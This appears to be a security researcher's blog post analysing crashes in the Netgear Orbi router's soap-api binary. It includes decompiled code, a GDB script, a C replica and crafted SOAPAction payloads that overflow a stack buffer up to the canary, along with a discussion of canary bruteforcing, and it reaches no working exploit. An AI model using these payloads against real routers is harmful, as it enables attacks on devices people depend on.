orbi hunting 0x1: crashes in soap-api
- introduction
- first find: buffer overflow in SendSoapResponse()
- deep dive: SendSoapResponse()
- (failed) exploit attempt #1
- exploit viability, revisited
- stack canary bypass, question mark?
- conclusion
- references
introduction
The Orbi provides a SOAP server which seems to primarily be used by the Netgear mobile application, reachable at http://<ROUTER>/soap/server_sa
. I had originally discovered this endpoint early on when I started looking at this router but it wasn’t until I had connected over serial that I realized it was incredibly easy to crash the binary that handles SOAP requests, /usr/sbin/soap-api
. In fact, almost every requests I sent to this endpoing caused a stack trace to be printed to the console. This seemed like a good enough place to start so I decided to figure out exactly what caused these crashes and whether any of it was exploitable.
Note: I chose to write about this issue and not report it to Netgear since merely crashing the soap-api
process does very little and doesn’t even really work as a denial-of-service mechanism because a new process is spawned on each request. As far as I can tell there’s no security impact here.
background
The SOAP server parses the HTTP header SOAPAction
on incoming requests to determine which SOAP action/method the user wants to trigger. The request is initially handled by lighttpd, where mod_cgi
handles initial processing and passes it onto soap-api
. The server sets environment variables that describe the request, which soap-api
then reads from in order to handle it.
The format of the SOAPAction
header is:
-
<urn:VENDOR:service:ACTION_str:1#METHOD_str
.
crash discovery
While doing some manual testing after starting with a known-good SOAPAction
header value, I found that server would send the following response when submitting a METHOD_str
part that is 248 characters or longer while simultaneously causing a crash dump to be printed to the console .
HTTP/1.1 200 OK
Content-Length: 763
Content-Type: text/xml; charset="UTF-8"
Server: Linux/2.6.15 uhttpd/1.0.0 soap/1.0
Connection: close
Date: Fri, 25 Jun 2021 14:09:01 GMT
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse xmlns:m="urn:NETGEAR-ROUTER:service:x:1"></m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
SOAP Len:0 Action:x Method:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgd = d7854000
[00000000] *pgd=00000000
CPU: 3 PID: 26769 Comm: soap-api Tainted: P 3.14.77 #1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtask: dce74380 ti: d6014000 task.ti: d6014000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPC is at 0xb6b52db4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALR is at 0xb6b4ee88
AAAAAAAAAAAAAAAAAAA IP:10.13.13.211
pc : [<b6b52db4>] lr : [<b6b4ee88>] psr: 60000010
sp : befff398 ip : 7f5fce58 fp : 7f6026fc
r10: befff424 r9 : befff44c r8 : befff48c
r7 : befff54c r6 : befff400 r5 : 7f5d4594 r4 : 00000000
r3 : 00000000 r2 : 00000001 r1 : 00000000 r0 : 00000000
Flags: nZCv IRQs on FIQs on Mode USER_32 ISA ARM Segment user
Control: 10c5387d Table: 9785406a DAC: 00000015
CPU: 3 PID: 26769 Comm: soap-api Tainted: P 3.14.77 #1
[<c021ea68>] (unwind_backtrace) from [<c021bb60>] (show_stack+0x10/0x14)
[<c021bb60>] (show_stack) from [<c03b5518>] (dump_stack+0x78/0x98)
[<c03b5518>] (dump_stack) from [<c02234b0>] (__do_user_fault+0x74/0xbc)
[<c02234b0>] (__do_user_fault) from [<c022385c>] (do_page_fault+0x2f0/0x370)
[<c022385c>] (do_page_fault) from [<c02083dc>] (do_DataAbort+0x34/0x98)
[<c02083dc>] (do_DataAbort) from [<c02096f4>] (__dabt_usr+0x34/0x40)
Exception stack(0xd6015fb0 to 0xd6015ff8)
5fa0: 00000000 00000000 00000001 00000000
5fc0: 00000000 7f5d4594 befff400 befff54c befff48c befff44c befff424 7f6026fc
5fe0: 7f5fce58 befff398 b6b4ee88 b6b52db4 60000010 ffffffff
Unfortunately, it was nearly impossible to identify where the crash was actually happening from the crash dump alone as the stack trace only shows the top of the call stack containing chain of calls in the kernel that handled the fault. Since the stack trace was no help, I figured the next step was to load soap-api
up in Ghidra and find where the SOAPACtion header was being parsed and trace it through the application, looking for places where it could overflow a buffer.
first find: buffer overflow in SendSoapResponse()
After digging through functions in the binary for a while and looking for strings that looked familiar/related to the output i was getting from the server, I found the following piece of code at function 0x0003e82c.
From looking at the non-stripped versions of this binary, I was able to identify this function as SendSoapResponse
. This function is responsible for constructing the HTTP response, including the response headers, sent to the client.
The overflow occurs on line 48 in the decompiled code shown above as a result of the call to sscanf()
. This line parses the SOAP method section from the server response content (<m:AAAAA[...]Response
) and writes it to the buffer auStack236
, which is a 64-byte static buffer, without any length checks. At this point I felt pretty confident this was the crash I was seeing in the stack traces, so next I wanted to understand what paths led to this code being executed.
After reading through the code some more I realized almost every request eventually led to SendSoapResponse()
(I mean, duh, right?). In general, the flow always goes a little something like this:
-
main()
- takes care of getting the SOAPAction header from an environment variable
SOAP_ACTION
orHTTP_SOAPACTION
(set by the parent HTTP server (lighttpd) or the CGI handler (modcgi, procgi)) - handles parsing of the SOAP action and SOAP method parts from the header
- saves pointers to the start of each section in the buffer/PTR returned by
getenv()
- these ptrs are passed to
SoapExecute()
- takes care of getting the SOAPAction header from an environment variable
-
SoapExecute()
- The main function that actually does handling of the various SOAP actions and methods
- Handles authentication checks
- Calls appropriate functions/etc based on submitted actions / method
- at the end of pretty much every case, it calls
SendSoapRespCode()
, passing thesoap_action
andsoap_method
pointers as arguments
-
SendSoapRespCode()
- Constructs a portion of the HTTP response one of two ways depending on whether the SOAP method was
Authenticate
or not - The HTML/XML blob is then passed on to
SendSoapResponse()
along with the SOAPAction header value
- Constructs a portion of the HTTP response one of two ways depending on whether the SOAP method was
-
SendSoapResponse()
- Here the final response content is finalized and sent to the client
live debugging
At this point I felt pretty confident I was crashing soap-api
from this buffer overflow so I was eager to see whether this bug would be exploitable. The stack traces I was seeing didn’t contain anything that immediately stood out as fishy (0x41s in registers, etc), so I wanted to do some live debugging on the device to validate my theory and poke around in memory. Since I had been unable to build a functional emulation environment where I could run soap-api
, I would have to debug on the baremetal. I used a static GDB for armhf downloaded from here: https://github.com/therealsaumil/static-arm-bins and copied it over to the Orbi.
For each request that accesses SOAP functionality, lighttpd
forks and (something) eventually executes soap-api
to handle this request. I initially had some trouble getting the debugger to catch when soap-api
was spawned and stay attached while other forks were created in the background, but eventually found a sequence of gdb commands that allowed me to catch soap-api
early and then tell gdb to stay attached.
These were:
- create break on
main()
set follow-fork-mode child
continue
- after sending a request,
lighttpd
forks and gdb attaches tosoap-api
and breaks on main() -
set follow-fork-mode parent
(to prevent new forks from taking over) continue
This was enough to allow GDB to stay attached to the process up until the SIGSEGV, though there were still other issues that broke backtraces and the lack of debug symbols only made this harder. To avoid having to go through this sequence manually each time, I wrote up a GDB script to set everything up and insert break points on sscanf()
and to catch signal 11. Each time the sscanf
breakpoint is hit we print a backtrace, frame info, registers, and the 10 words from the current stack pointer, and do the same on segfault.
set width 0
set height 0
set verbose off
set follow-fork-mode child
break main
commands 1
set follow-fork-mode parent
continue
end
break sscanf
commands 2
backtrace full
info frame
info registers
x/10x $sp
continue
end
catch signal 11
commands 3
bt full
i frame
i registers
end
continue
lolwut: a null dereference
With the debugging setup figured out, I attached GDB to the lighttpd process, passed it the script, and then sent a request to trigger the bug — and then I got this:
This output seemed to indicate that:
- The crash was happening in
strcmp
inlibc.so.1
- The crash was actually caused by a NULL dereference when the code attempted to access the address stored in register
r0
, which is 0 at the time of the crash
deep dive: SendSoapResponse()
At this point, I was pretty confused. The condition for the crash was definitely tied to the length of the SOAP method and there’s definitely a buffer overflow, but that wasn’t what was causing the bug. I tried different payload lengths and values to see if it caused anything other than a null pointer defer but was unsuccessful. This is when I decided it was time to go back to Ghidra and go through the code line-by-line to try to understand what was happening.
how the payload reaches SendSoapResponse()
The SOAP action and method strings are initially parsed from the SOAPAction
HTTP header in main()
and these are passed in as arguments to other functions that use them. By the time execution reaches SendSoapResponse(), the method and action strings have been used to construct the SOAP response body by the calling function SendSoapRespCode()
. The code snippet below shows how the SOAP body string is constructed:
char resp[512];
char *resp_fmt = "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\"></m:%sResponse>\r\n<ResponseCode>%03d</ResponseCode>\r\n";
snprintf(resp_b, 512, resp_fmt, SOAP_METHOD, SOAP_ACTION, SOAP_METHOD, response_code);
Assuming a method “METHOD”, action “ACTION, and response code 404, the resulting string would be:
<m:METHODResponse xmlns:m="urn:NETGEAR-ROUTER:service:ACTION:1"></m:METHODResponse>
<ResponseCode>404</ResponseCode>
snprintf()
will read 512 bytes at most, but that can occur in the first format string it inserts if it’s long enough, resulting in no further formatting and the rest of the string being truncated. For example, submitting a method string containing 500 A’s results in the following string:
<m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse
code breakdown
The code block below is the same as the one shown in the screenshot in the “first find” section earlier in this post but with annotations and renamed variables from after having gone through it all and labeled everything.
Ghidra decompiler output:
/*1*/ if (is_soap_login == 1) {
/*2*/ local_jwt_ptr = (char *)cat_file("/tmp/jwt_local");
/*3*/ fprintf(stream,
/*4*/ "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nS erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\nSet-Cookie: jwt_local=%s\r\n\r\n"
/*5*/ ,total_content_len,local_jwt_ptr);
/*6*/ }
/*7*/ else {
/*8*/ fprintf(stream,
/*9*/ "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nS erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n\r\n"
/*10*/ ,total_content_len);
/*11*/ }
/*12*/ soap_log(2,
/*13*/ "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nSe rver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n"
/*14*/ ,total_content_len);
/*15*/ fputs(s_<?xml_version="1.0"_encoding="UT_000bd624,stream);
/*16*/ fputs(resp,stream);
/*17*/ fputs(s_</SOAP-ENV:Body>_</SOAP-ENV:Enve_000bd6fc,stream);
/*18*/ soap_log(0,"%s%s%s",s_<?xml_version="1.0"_encoding="UT_000bd624,resp,
/*19*/ s_</SOAP-ENV:Body>_</SOAP-ENV:Enve_000bd6fc);
/*20*/ fflush(stream);
/*21*/ if ((ext_mode == 0) &&
/*22*/ (total_content_len = config_invmatch("installState",&DAT_0008d1a0), total_content_len != 0)) {
/*23*/ /* OVERFLOW - method_response_buf is 64 bytes and sscanf does not check length
/*24*/ */
/*25*/ sscanf(resp,"<m:%sResponse%*s",method_response_buf);
/*26*/ strstr_Response_ret = (char *)strstr_wrapper(method_response_buf,"Response");
/*27*/ if (strstr_Response_ret != (char *)0x0) {
/*28*/ *strstr_Response_ret = '\0';
/*29*/ }
/*30*/ /* POSSIBLE NULL DEREF, strstr_wrapper might return null */
/*31*/ ptr_to_substrings_found = (char *)strstr_wrapper(resp,"service:");
/*32*/ sscanf(ptr_to_substrings_found,"service:%[^:]",service_action_buf);
/*33*/ ptr_to_substrings_found = (char *)strstr_wrapper(resp,"<ResponseCode>");
/*34*/ if (ptr_to_substrings_found != (char *)0x0) {
/*35*/ sscanf(ptr_to_substrings_found,"<ResponseCode>%[^<]",&local_114);
/*36*/ }
/*37*/ vsnprintf_wrap(combined_action_method_str,0x80,"%s:%s",service_action_buf,method_response_buf);
/*38*/ execve_wrapper_maybe
/*39*/ ("/dev/console",0,3,"/usr/sbin/ra_installevent","soapresponse",
/*40*/ combined_action_method_str,&local_114,0);
/*41*/ FUN_0001ae0c("ra_install","method=%s, code=%s",combined_action_method_str,&local_114);
/*42*/ }
-
Arguments:
-
FILE *stream
: filestream where response will be written (socket back to client?) -
char *resp
: a 512 byte buffer containing the body of the XML SOAP response contructed by the calling function (DoSoapRespCode
)
-
-
Lines 1-20 in the snippet handle constructing and send the response content to the client by writing that content to the file stream passed in as the first argument to SendSoapResponse
- note: this is why the response is always sent no matter
-
Line 25: a call to
sscanf
to attempt to parse the SOAP method string- other functions up the call stack have parsed and placed the method string into an XML component in the
resp
argument passed toSendSoapResponse
-
sscanf
searches for the pattern<m:*Response*
and will parse the content between the colon up to the end of ‘Response’ -
method_response_buf
is a static 64 byte buffer - its possible to overflow this buffer if the string between
<m:
andResponse*
is greater than 64 bytes, which appears to be possible to do
- other functions up the call stack have parsed and placed the method string into an XML component in the
-
Line 26: a call to a
strstr
wrapper to check for the presence of the string “Response
” in the data that was read intomethod_response_buf
bysscanf
- this wrapper first checks to make sure neither of the two arguments passed to it are NULL
- if either of them are, it doesn’t call strstr and just returns a NULL pointer
- if they’re not, it calls
strstr
and then returns whateverstrstr
returned;strstr
also returns NULL if the string is not found
- If the submitted SOAP method has pushed
Response
string entirely off of the XML buffer that is constructed, this would return NULL
- this wrapper first checks to make sure neither of the two arguments passed to it are NULL
-
Line 27-29: if the call to
strstr
did NOT return NULL (theResponse
string was found), set the value at the first char ofResponse
to NULL- This null terminates the string so that only the SOAP method part is parsed by other funcs that stop reading at NULL and the Response part is truncated
-
Line 31: another call to
strstr
wrapper, this time checking theresp
argument containing the XML constructed by the calling function for the string"service:"
- there is no check after this to see if this returned NULL
-
Line 32: second call to
sscanf
that attempts to parse the SOAP action string from the pattern"service:*:"
, this time using the value returned by the call tostrstr
on the previous line as it’s source- since this value was not checked for NULL before this call to sscanf, this is likely the path taken to reach the crash condition
- this only happens when the method string was sufficiently long to have pushed
"service:*:"
string off of the XML body buffer resp
-
Line 33: third call to
strstr
wrapper, this time searching for the string"<ResponseCode>"
inresp
otherwise this is skipped -
Line 34: if the string was found by the call to
strstr
in the previous line,sscanf
is used to parse out a substring similar to previous calls; otherwise this is just skipped.
takeaways
After going through the code, I knew the following:
- It is possible to overflow
method_response_buf
that the first call tosscanf()
writes the method string to. - It is possible to overflow
service_action_buf
that the second call tosscanf()
writes the action string to. - A NULL dereference will occur in the second call to
sscanf
if the string'service:'
is not found inresp
.- This will occur if the method string submitted is long enough to cause the SOAP action portion (
service:
) to be truncated from the final response data inresp
- This will occur if the method string submitted is long enough to cause the SOAP action portion (
Knowing this, it was clear to see why the payloads I was sending were causing the null dereference: the method strings were sufficiently long to have caused the 'service:'
string to be truncated from the end of resp
, causing the strstr()
call which checks for it to return a null pointer that is then passed to sscanf()
without checking if it was null first.
(failed) exploit attempt #1
The results of the code analysis indicated that in order to successfully trigger a crash caused by the buffer overflow, the following conditions would need to be met:
- the method string needs to be long enough for the overflow to be useful (i.e. overwriting the return address, base pointer, etc.)
- the final contents of
resp
must include the string'service:'
]
With this in mind, I went back and spent some time trying payloads I thought would successfully avoid triggering the null defererence but was ultimately unsuccessful. My (incorrect) conclusion was that the conditions necessary to overwrite something important made it impossible to ensure the check for to service string would be passed. I had tried putting it both at the beginning and end of the payload string but this still caused the null deref every time. I had been looking at this bug for a few days at this point and had was pretty exhausted so I just called it at that point and concluded that the even though the buffer overflow was there, it was ‘unreachble’ due to the (incorrect) contstraints I had in mind at the time. Honestly, I was just relieved to be done with it.
exploit viability, revisited
As hinted at above, I did eventually revisit the question of whether the buffer overflow could be triggered a few weeks later and found a way to do it! In fact, it actually happened while I was in the process of writing the first part of this post, where I was basically going to end with section before this one, saying there was no way to get around it. While I was reading through my notes and trying to clean everything up and make sure it all made sense, I noticed I had made some mistakes and incorrect assumptions that had caused me to have an inaccurate understanding of the contstraints. I’ve corrected those mistakes and cleaned things up in the code breakdown above in the interest of clarity but basically I had an incorrect understanding of the constraints and the behavior of sscanf()
. Anyway, I updated my mental model of the bug.
With a new understanding of the constraints , I went back to the code and did some more testing to see if it would be possible to overflow method_response_buf
while avoiding the NULL deference caused by failing the check for "service:"
. Assuming this can be done successfully, the program should then crash due to failing a stack canary check. Stack canary protection (as well as PIE and RELRO) was enabled between firmware versions 2.5.1.16 - 2.7.33.
From the GPL archive (soap-api
is part of the net-cgi
package):
./package/dni/net-cgi/Makefile:TARGET_CFLAGS += -Werror -Wl,-z,now -Wl,-z,relro -fPIE -pie -fstack-protector
local testing
In order to get a better understanding of the actual behavior of the application with a better debugging environment to work in, I wrote the following code to simulate the same behavior on my own system.
int replica (FILE *stream, char *resp) {
// THE ORDER OF VARIABLES IN MEMORY IS IMPORTANT TO REPRODUCE ACCURATELY (or at least close to accurate)
int content_len;
char* jwt;
char *var2;
char *var3;
char *var4;
char method_buf[64];
char action_buf[32];
char combined_action_method[128];
char *undef1;
char *undef2;
int stack_check_val;
printf("resp: %s\n", resp);
// fake stack canary
stack_check_val = 0x313373;
printf("[+] stack check start: 0x%x\n", stack_check_val);
// null the buffers
memset(method_buf, 0, 64);
memset(action_buf, 0, 32);
memset(combined_action_method, 0, 128);
// call sscanf - 1: parse the Method portion from the xml blob in resp
// and save it to method buf (format is '<m:METHODResponse*'). there is a buffer overflow
// here if the parsed string is greater than 64 bytes
printf("[+] sscanf call 1: parse method portion from resp\n");
sscanf(resp, "<m:%sResponse%*s", method_buf);
// this would check to confirm that the expected pattern/str was parsed (should still
// contain the 'Response' portion - a long enough method will cause this to be truncated and we'll
// fail this check.
var2 = strstr(method_buf, "Response");
// but it doesn't really matter because it's only to see if
if (var2 != (char *)0x0) {
printf("[+] found 'Response' in method_buf, NULLED\n");
*var2 = 0x0;
}
// ========= Second call to sscanf() and NULL check fail ===========
// search for service string in resp, no NULL check
// a long enough METHOD would result in this being truncated, causing strstr
// to return a NULL pointer
printf("[+] strstr call 1: check for 'service:' in resp\n");
var3 = (char *)strstr(resp, "service:");
// DEBUG -- show when we fail this check
if (var3 == (char *)0x0) {
printf("\033[0;31m[!] didn't find 'service:', expect a NULL ptr deref\n\033[0m");
printf("resp: %s\n", resp);
}
printf("[+] sscanf call 2: parse ACTION portion from resp\n");
sscanf(var3, "service:%[^:]", action_buf);
// check for <ResponseCode> in resp
printf("[+] strstr call 2: check for '<ResponseCode>' in resp\n");
var3 = (char *)strstr(resp, "<ResponseCode>");
if (var3 != (char *)0x0) {
// if its there, parse some stuff from it (not important right now)
printf("[+] found <ResponseCode>, passed check\n");
undef1 = 0;
}
// check if the stack check int was overwritten
printf("[+] stack check end: 0x%x\n", stack_check_val);
return 0;
}
int main(int argc, char *argv[]) {
// args to pass to target func (replicating original)
FILE *streams = 0;
// this will hold the payload (i.e. the Method portion we would submit)
// read from env to make testing easier
char *payload = getenv("PAYLOAD");
printf("[+] payload length: %d\n", strlen(payload));
// construct the response content the same way the server does in SendSoapRespCode()
char resp_b[512];
memset(resp_b, 0, 512);
// this is the fmt string the calling function uses to construct resp
char *resp_fmt = "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\"></m:%sResponse>\r\n<ResponseCode>%03d</ResponseCode>\r\n";
snprintf(resp_b, 512, resp_fmt, payload, "ConfigSync", payload, 404);
// call the target function with the payload
printf("[+] calling target function...\n\n");
replica(streams, resp_b);
return 0;
}
I experimented with various payloads using this code and this is when I made a new discovery: different payloads would cause resp
to be corrupted in different ways, which would sometimes result in resp
containing the ‘service:’ string before the first call to sscanf()
but not after. The output below shows this happening with payload one would assume would definitely pass the string check:
-> % ./replica2
[+] payload length: 130
[+] calling target function...
resp: <m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response xmlns:m="urn:NETGEAR-ROUTER:service:ConfigSync:1"></m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAA
AAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response>
<ResponseCode>404</ResponseCode>
[+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] found 'Response' in method_buf, NULLED
[+] strstr call 1: check for 'service:' in resp
[!] didnt find 'service:', expect a NULL ptr deref
resp: e:
[+] sscanf call 2: parse ACTION portion from resp
[1] 221258 segmentation fault (core dumped) ./replica2
After some trial and error I eventually found a payload that would successfully overflow method_buf
, avoid the null deref, and overwrite the simulated stack canary:
-> % ./replica2
[+] payload length: 2450
[+] calling target function...
resp: <m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:se
[+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] strstr call 1: check for 'service:' in resp
[+] sscanf call 2: parse ACTION portion from resp
[+] strstr call 2: check for '<ResponseCode>' in resp
[+] stack check end: 0x63697672
[1] 221814 segmentation fault (core dumped) ./replica2
Nice!
now, against the device
With a new payload in hand, I moved back to testing this against the actual device while attached with GDB. After a bit of tweaking to account for differences in memory layout, I eventually noticed that this payload resulted in the process receiving a SIGKILL and dying rather than triggering the SIGSEGV caused by the null dereference.
"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaa"
I modified the GDB script I had been using to break on __stack_chk_fail()
instead of sscanf()
to confirm and saw this in the output:
Finally! The null dereference had been avoided and it was the stack canary check failing that was causing the application to die. After all the trouble I’d gone through digging into this bug, that felt goooooood.
I spent a little more time playing with the payload until I found the exact place where the canary overwrite actually happened and trimmed it down to this:
"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:**BBBBBB**"
Thread 2.1 "soap-api" hit Breakpoint 3, 0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
#0 0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
r0 0x0 0
r1 0xb6f01b65 3069188965
r2 **0x42424242** 1111638594
r3 0x5719b01e 1461301278
r4 0x0 0
r5 0xb6a39214 3064173076
r6 0xb6f2bb80 3069361024
r7 0xbe88e4cc 3196642508
r8 0xbe88e40c 3196642316
r9 0xbe88e3cc 3196642252
r10 0xbe88e3a4 3196642212
r11 0xb6f316fc 3069384444
r12 0xb6f2bc6c 3069361260
sp 0xbe88e388 0xbe88e388
lr 0xb6eb2aa8 -1226102104
pc 0xb69aee40 0xb69aee40 <__stack_chk_fail>
cpsr 0x80000010 -2147483632
0x0: <error: Cannot access memory at address 0x0>
0xb6f01b65: ""
0x42424242: <error: Cannot access memory at address **0x42424242**>
0x5719b01e: <error: Cannot access memory at address 0x5719b01e>
stack canary bypass, question mark?
So, after weeks (months?) of poking at this bug on and off and eventually giving up, I’d come back and managed to get back to square one: a buffer overflow that was triggering the stack check fail and crashing the application. Naturally, the next step was to explore ways to get past the stack canary and see if I could get a working exploit going. I’ve only ever dealt with stack canaries in toy examples so this would be my first time trying against a real target and having to do it with the limited debugging environment only made things more difficult.
a primer on SSP
The Stack Smashing Protector (SSP) is a compiler feature specifically design to detect stack-based buffer overflows and abort the program if one is detected to mitigate the potential effects of the memory corruption. There are various implementations of this feature, but they all follow a similar design: the compiler inserts code that copies a value from a global variable into a local variable (the canary) at the start of a function and code to check that this value still matches the value saved in the global variable at the end of the function, before it returns. If the values do not match, the program is immediately terminated to prevent further execution that could result in undefined behavior. The canary is usually inserted into the stack in such a way that it sits immediately before the return address at the edge of the current function’s stack frame — this means a buffer overflow that has successfully corrupted the return address would have also corrupted the canary value, which would result in the canary check failing and the program being aborted before the function returns and attempts to use the corrupted return address.
For GCC’s -fstack-protector
, for example:
This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.
It’s important to note one thing: this protection does not prevent overflows from happening — it’s only meant to detect them and try to mitigate against classic stack overflow exploitation. This means that any code that executes after the overflow has occurred but before the end of the function when the canary is check could be affected by the effects of the memory corruption. Modern implementations do a few things to mitigate against this as well, such as reordering of variable declarations to move non-buffer variables ‘above’ overflow-able buffers so that they cannot be (easily) corrupted and placing all buffers together in memory right before the canary and return address to limit the scope of data that can be corrupted and increasing the likelyhood of overflows overwriting the canary value.
Another important point is that the canary value is set at runtime, so it remains the same for the entire lifetime of the application, as well as if the application forks. New processes started via the shell or execve()
will have unique canaries.
I took a look at arch/arm/include/asm/stackprotector.h
in the kernel sources for the kernel used by the device (custom fork of 3.14.77) and found this code, showing that for canary is initialized by XORing random bytes against the value of LINUX_VERSION_CODE
on ARM architectures:
static __always_inline void boot_init_stack_canary(void)
{
unsigned long canary;
/* Try to get a semi random initial value. */
get_random_bytes(&canary, sizeof(canary));
canary ^= LINUX_VERSION_CODE;
current->stack_canary = canary;
__stack_chk_guard = current->stack_canary;
}
bruteforcing? I guess…not
Generally speaking, there are two ways of going about bypassing the canary check:
- Use a separate memory leak vulnerability to leak the canary value so that it can be correctly overwritten
- Bruteforce the canary byte-by-byte (only works under certain conditions)
Since I hadn’t found any ways to leak memory, the only real option I would have is bruteforcing. There’s a specific bruteforcing technique that can greatly reduce the total number of attempts needed to determine the canary value by guessing one byte at a time, using the lack of a crash as an oracle to determine when the correct byte has been guessed and repeating this for each byte of the canary. As mentioned above, this only works under certain conditions: the program must keep the same canary between payloads (i.e. fork-and-accept servers) and the code that reads the payload must not append a NULL byte (e.g.read
/ recv
). I found a few good resources that helped me better understand this concept such as this LiveOverflow video and this CTF guide (screenshot below taken from here)
Seems easy enough, right? I went back to the device and determined the minimum length to overflow the buffer and trigger the stack check fail was 209 characters. After sending only a couple of requests and watching the values in the debugger I quickly realized this wasn’t going to work at all.
The output belows shows the debugger breaking at the start of __stack_chk_fail()
with r2
containing the local copy of the stack canary that has been overwritten by a single byte and r3
containing the original. As you can see, the byte that was written was 00
(NULL) — the function that reads the payload into the buffer (sscanf()
) appends a NULL. So, the first condition for this to be viable is out.
Thread 2.1 "soap-api" hit Breakpoint 2, 0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
#0 0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
No symbol table info available.
Backtrace stopped: Cannot access memory at address 0x4f532f34
Stack level 0, frame at 0xbecd34c8:
pc = 0xb698be40 in __stack_chk_fail; saved pc = 0xb6e8faa8
Outermost frame: Cannot access memory at address 0x4f532f34
Arglist at 0xbecd34c8, args:
Locals at 0xbecd34c8, Previous frame's sp is 0xbecd34c8
r0 0x0 0
r1 0xb6edeb65 3069045605
**r2 0xb710d200 3071332864**
r3 0xb710d29e 3071333022
r4 0x0 0
r5 0xb6a16214 3064029716
r6 0xb6f08b80 3069217664
r7 0xbecd360c 3201119756
r8 0xbecd354c 3201119564
r9 0xbecd350c 3201119500
r10 0xbecd34e4 3201119460
r11 0xb6f0e6fc 3069241084
r12 0xb6f08c6c 3069217900
sp 0xbecd34c8 0xbecd34c8
lr 0xb6e8faa8 -1226245464
pc 0xb698be40 0xb698be40 <__stack_chk_fail>
cpsr 0x80000010 -2147483632
Not only that, the canary value was changing in between each request. In retrospect, this is obvious since soap-api
is not forking itself to handle the requests, but instead being execve
‘ed at some point after lighttpd
forks.
